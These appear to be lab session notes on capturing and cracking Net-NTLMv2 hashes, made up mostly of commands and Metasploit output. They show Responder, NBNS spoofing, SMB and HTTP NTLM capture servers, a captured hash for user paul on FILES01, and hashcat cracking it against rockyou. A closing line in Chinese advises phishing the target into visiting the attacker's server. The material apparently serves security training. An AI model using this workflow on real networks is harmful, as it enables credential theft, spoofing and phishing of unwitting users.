# Session notes: capturing a Net-NTLMv2 authentication and cracking it offline.
# The msfconsole transcript and the captured hash that follow belong to the
# same session; the IPs/hostnames (192.168.45.159, FILES01) are the ones
# shown there.
# NOTE(review): tun0 is a layer-3 tunnel interface. That is also why the
# nbns_response module later in this transcript fails on it — its BPF filter
# references ethernet addresses, which libpcap only supports on ethernet-like
# link types (see the PCAPRUB::BPFError text in the transcript).
sudo responder -I tun0
# Find the hashcat mode number for the captured hash type; 5600 is NetNTLMv2,
# i.e. the "user::DOMAIN:server_challenge:response:blob" line that the SMB
# capture module prints below.
hashcat -h | grep -i "ntlm"
# paul.hash is expected to hold the captured line (paul::FILES01:...) exactly
# as printed, one hash per line.
# --force makes hashcat ignore its own startup warnings (e.g. an unsupported
# or outdated OpenCL/CUDA driver); results produced under --force are not
# guaranteed to be reliable, so prefer resolving the underlying warning
# instead of silencing it.
hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force
msf6 > use auxiliary/server/capture/smb
msf6 auxiliary(server/capture/smb) > set srvhost 192.168.45.159
srvhost => 192.168.45.159
msf6 auxiliary(server/capture/smb) > set JOHNPWFILE /tmp/john_smb
JOHNPWFILE => /tmp/john_smb
msf6 auxiliary(server/capture/smb) > exploit
[*] Auxiliary module running as background job 0.
[*] JTR hashes will be split into two files depending on the hash format.
[*] /tmp/john_smb_netntlm for NTLMv1 hashes.
[*] /tmp/john_smb_netntlmv2 for NTLMv2 hashes.
[*] Server is running. Listening on 192.168.45.159:445
[*] Server started.
msf6 auxiliary(server/capture/smb) > use auxiliary/spoof/nbns/nbns_response
msf6 auxiliary(spoof/nbns/nbns_response) > set SPOOFIP 192.168.45.159
SPOOFIP => 192.168.45.159
msf6 auxiliary(spoof/nbns/nbns_response) > set INTERFACE tun0
INTERFACE => tun0
msf6 auxiliary(spoof/nbns/nbns_response) > run
[*] Auxiliary module running as background job 2.
[-] Auxiliary failed: PCAPRUB::BPFError invalid bpf filter: ethernet addresses supported only on ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/capture.rb:139:in `setfilter'
msf6 auxiliary(spoof/nbns/nbns_response) > [-] /usr/share/metasploit-framework/lib/msf/core/exploit/capture.rb:139:in `open_pcap'
[-] /usr/share/metasploit-framework/modules/auxiliary/spoof/nbns/nbns_response.rb:145:in `run'
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 192.168.219.211
[SMB] NTLMv2-SSP Username : FILES01\paul
[SMB] NTLMv2-SSP Hash : paul::FILES01:37deabe5fef5e9ae:6cf8e75e1fa372f9bdd3d2c687519959:010100000000000080aca5343b8dd901bb2665e62562c2aa000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f00550050000700080080aca5343b8dd901060004000200000008003000300000000000000000000000002000007f1bd75bae0ffde594bca74c62b4d3cb1656aec27e52436eb09106e3ac6c5c580a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003100350039000000000000000000
msf6 > use auxiliary/server/capture/http_ntlm
msf6 auxiliary(server/capture/http_ntlm) > set srvhost 192.168.45.159
srvhost => 192.168.45.159
msf6 auxiliary(server/capture/http_ntlm) > set SRVPORT 80
SRVPORT => 80
msf6 auxiliary(server/capture/http_ntlm) > set URIPATH /
URIPATH => /
msf6 auxiliary(server/capture/http_ntlm) > set JOHNPWFILE /home/kali/
JOHNPWFILE => /home/kali/
msf6 auxiliary(server/capture/http_ntlm) > exploit
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/capture/http_ntlm) >
[*] Using URL: http://192.168.45.159/
[*] Server started.
[*] 2023-05-23 02:09:31 -0400
NTLMv2 Response Captured from FILES01
DOMAIN: USER: paul
LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled
NTHASH:e0f7edf0bb767cbd51e727f62b6722c4 NT_CLIENT_CHALLENGE:01010000000000005bc6d7223d8dd9015bebf059764da56f0000000002000c0044004f004d00410049004e000000000000000000
当我们配置并运行模块后，攻击主机这边就会启用 HTTP 服务。然后钓鱼让目标用户去访问即可。当目标用户访问后，就会弹框提示登录。这时无论对方是否真的登录，我们都会抓到其 Net-NTLMv2 hash。